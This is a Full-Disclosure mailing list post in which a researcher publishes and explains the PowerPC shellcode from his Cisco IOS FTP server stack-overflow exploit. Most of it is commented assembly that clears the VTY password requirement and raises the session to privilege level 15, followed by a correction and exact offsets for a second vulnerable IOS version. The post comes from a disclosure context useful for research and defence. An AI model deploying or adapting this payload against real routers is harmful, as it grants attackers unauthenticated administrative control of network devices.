Anyone spot the typo? It's also in a comment in the exploit source,
but doesn't affect how the code works:
"addi 7,7,233" should read "addi 7,7,2330"
The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4
Its worth noting that at some stage around IOS 12.4 this structure
changed slightly and therfore if you were planning on exploiting
12.4(7a) which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec
Cheers,
Andy
On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis
<iosftpexploit@googlemail.com> wrote:
Hi,
Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:
.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c
lis 4,vty_info@ha
la 4,vty_info@l(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
//the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,233 //Add second offset in two steps to
//avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
//priv escalate to level 15
//(technically this should be 0xff100000
//but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
//to pass to terminate()
lis 4,terminate@ha
la 4,terminate@l(4)
mtctr 4
bctr //terminate "this process"
//(current connection to the FTP server)
Cheers,
Andy
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
